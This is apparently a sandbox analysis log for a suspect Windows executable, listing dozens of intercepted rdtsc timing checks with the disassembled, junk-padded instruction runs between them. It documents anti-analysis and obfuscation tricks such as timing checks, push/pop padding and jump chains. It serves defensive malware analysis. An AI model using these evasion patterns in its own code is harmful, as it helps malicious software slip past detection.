          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C84F second address: A5C855 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5C855 second address: A5C865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F1FDD1C1206h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61BEE second address: A61BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61BF6 second address: A61BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A61EB7 second address: A61EBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62032 second address: A62038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62347 second address: A62361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C143Fh 0x00000009 ja 00007F1FDD1C1436h 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62361 second address: A62372 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1FDD1C120Bh 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A62372 second address: A623A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F1FDD1C1456h 0x00000010 jmp 00007F1FDD1C143Ah 0x00000015 jmp 00007F1FDD1C1446h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A63160 second address: A63174 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F1FDD1C1223h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A65BF5 second address: A65C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F1FDD1C1436h 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A780C4 second address: A780DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F1FDD1C1214h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A780DD second address: A780E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7988C second address: A798A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edi 0x00000006 jmp 00007F1FDD1C1215h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BD14 second address: A7BD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BD18 second address: A7BD6E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1FDD1C1206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F1FDD1C1210h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push edi 0x00000016 jnc 00007F1FDD1C121Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F1FDD1C1213h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7BD6E second address: A7BD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A896F1 second address: A896F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8923D second address: A8926C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F1FDD1C143Eh 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F1FDD1C1449h 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8926C second address: A89270 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A893F1 second address: A89408 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1443h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3605 second address: AA3617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 jns 00007F1FDD1C1206h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3D4C second address: AA3D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1FDD1C1448h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3D6A second address: AA3D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jne 00007F1FDD1C1206h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop edi 0x0000000f jmp 00007F1FDD1C1213h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jc 00007F1FDD1C1206h 0x0000001e push edi 0x0000001f pop edi 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3D98 second address: AA3D9E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA3EEC second address: AA3EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4079 second address: AA407D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA407D second address: AA4083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4083 second address: AA4089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4089 second address: AA408F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA408F second address: AA4093 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA436A second address: AA4370 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA4370 second address: AA437A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F1FDD1C1436h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA8651 second address: AA8655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA88F3 second address: AA88F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA88F7 second address: AA8922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a jbe 00007F1FDD1C1206h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F1FDD1C1218h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAA03A second address: AAA03E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7D98 second address: 9B7D9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7F8B second address: 9B7F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8136 second address: 9B815E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1FDD1C1216h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnc 00007F1FDD1C1206h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B815E second address: 9B8163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0336 second address: 4EA033C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA033C second address: 4EA0340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0340 second address: 4EA036B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F1FDD1C1218h 0x00000013 pop esi 0x00000014 mov cx, dx 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA036B second address: 4EA038C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1FDD1C143Ah 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA038C second address: 4EA0390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0390 second address: 4EA0396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA03AC second address: 4EA03C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C1210h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA03C0 second address: 4EA03C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0386 second address: 4ED038A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED038A second address: 4ED039B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED039B second address: 4ED03DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1211h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1FDD1C120Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F1FDD1C1210h 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov dx, CC40h 0x0000001e mov ecx, edx 0x00000020 popad 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED03DC second address: 4ED03E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED03E2 second address: 4ED03E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED03E6 second address: 4ED040B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F1FDD1C143Bh 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED040B second address: 4ED0411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0411 second address: 4ED0445 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F1FDD1C1440h 0x0000000f push eax 0x00000010 jmp 00007F1FDD1C143Bh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov eax, 468F79E1h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0445 second address: 4ED0483 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov esi, 56741F63h 0x0000000b popad 0x0000000c lea eax, dword ptr [ebp-04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F1FDD1C120Bh 0x00000018 and al, FFFFFF8Eh 0x0000001b jmp 00007F1FDD1C1219h 0x00000020 popfd 0x00000021 mov ah, 7Ch 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0483 second address: 4ED04A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C1449h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED04A0 second address: 4ED04D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c movsx edx, si 0x0000000f pushfd 0x00000010 jmp 00007F1FDD1C1210h 0x00000015 adc cl, FFFFFF98h 0x00000018 jmp 00007F1FDD1C120Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED04D0 second address: 4ED0502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F1FDD1C143Fh 0x00000009 xor cl, 0000005Eh 0x0000000c jmp 00007F1FDD1C1449h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0502 second address: 4ED054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F1FDD1C1219h 0x00000012 pushfd 0x00000013 jmp 00007F1FDD1C1210h 0x00000018 and si, 00B8h 0x0000001d jmp 00007F1FDD1C120Bh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED05ED second address: 4ED060F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C1442h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F1FDD1C1487h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED060F second address: 4ED0613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0613 second address: 4ED0617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0617 second address: 4ED061D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED061D second address: 4ED062C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1FDD1C143Bh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED064B second address: 4ED0695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b jmp 00007F1FDD1C1216h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F1FDD1C120Dh 0x00000019 call 00007F1FDD1C1210h 0x0000001e pop eax 0x0000001f popad 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0695 second address: 4ED069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED069B second address: 4ED069F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED069F second address: 4ED06A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED06A3 second address: 4EC0040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 jmp 00007F1FDD1C1216h 0x0000000e retn 0004h 0x00000011 nop 0x00000012 cmp eax, 00000000h 0x00000015 setne al 0x00000018 xor ebx, ebx 0x0000001a test al, 01h 0x0000001c jne 00007F1FDD1C1207h 0x0000001e xor eax, eax 0x00000020 sub esp, 08h 0x00000023 mov dword ptr [esp], 00000000h 0x0000002a mov dword ptr [esp+04h], 00000000h 0x00000032 call 00007F1FE18AA643h 0x00000037 mov edi, edi 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F1FDD1C120Dh 0x00000040 or esi, 4BAD0386h 0x00000046 jmp 00007F1FDD1C1211h 0x0000004b popfd 0x0000004c popad 0x0000004d xchg eax, ebp 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 push ebx 0x00000052 pop ecx 0x00000053 jmp 00007F1FDD1C120Fh 0x00000058 popad 0x00000059 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0040 second address: 4EC0046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0046 second address: 4EC004A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC004A second address: 4EC00A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C143Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F1FDD1C1449h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F1FDD1C143Eh 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a jmp 00007F1FDD1C143Eh 0x0000001f popad 0x00000020 push FFFFFFFEh 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 mov bh, al 0x00000029 popad 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00A0 second address: 4EC00E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F1FDD1C120Eh 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007F1FDD1C1209h 0x00000011 jmp 00007F1FDD1C120Ch 0x00000016 push eax 0x00000017 jmp 00007F1FDD1C120Bh 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00E0 second address: 4EC00E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00E4 second address: 4EC00E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00E8 second address: 4EC00EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00EE second address: 4EC00F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00F4 second address: 4EC00F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC00F8 second address: 4EC0164 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push edi 0x0000000f mov di, si 0x00000012 pop eax 0x00000013 jmp 00007F1FDD1C1217h 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d jmp 00007F1FDD1C1219h 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 call 00007F1FDD1C1213h 0x0000002b pop ecx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0164 second address: 4EC0169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0169 second address: 4EC016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC016F second address: 4EC0173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0173 second address: 4EC024F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1FDD1C120Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push 08D5FE35h 0x00000010 pushad 0x00000011 call 00007F1FDD1C1217h 0x00000016 mov si, C7FFh 0x0000001a pop ecx 0x0000001b mov bl, F6h 0x0000001d popad 0x0000001e add dword ptr [esp], 6CD32D3Bh 0x00000025 pushad 0x00000026 mov esi, 4857FCC9h 0x0000002b movzx ecx, bx 0x0000002e popad 0x0000002f mov eax, dword ptr fs:[00000000h] 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F1FDD1C1217h 0x0000003c or cx, 8D2Eh 0x00000041 jmp 00007F1FDD1C1219h 0x00000046 popfd 0x00000047 mov ch, B3h 0x00000049 popad 0x0000004a push eax 0x0000004b pushad 0x0000004c call 00007F1FDD1C1212h 0x00000051 pushfd 0x00000052 jmp 00007F1FDD1C1212h 0x00000057 adc si, 4508h 0x0000005c jmp 00007F1FDD1C120Bh 0x00000061 popfd 0x00000062 pop eax 0x00000063 popad 0x00000064 mov dword ptr [esp], eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F1FDD1C1212h 0x0000006e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC024F second address: 4EC0255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0255 second address: 4EC0259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0259 second address: 4EC025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
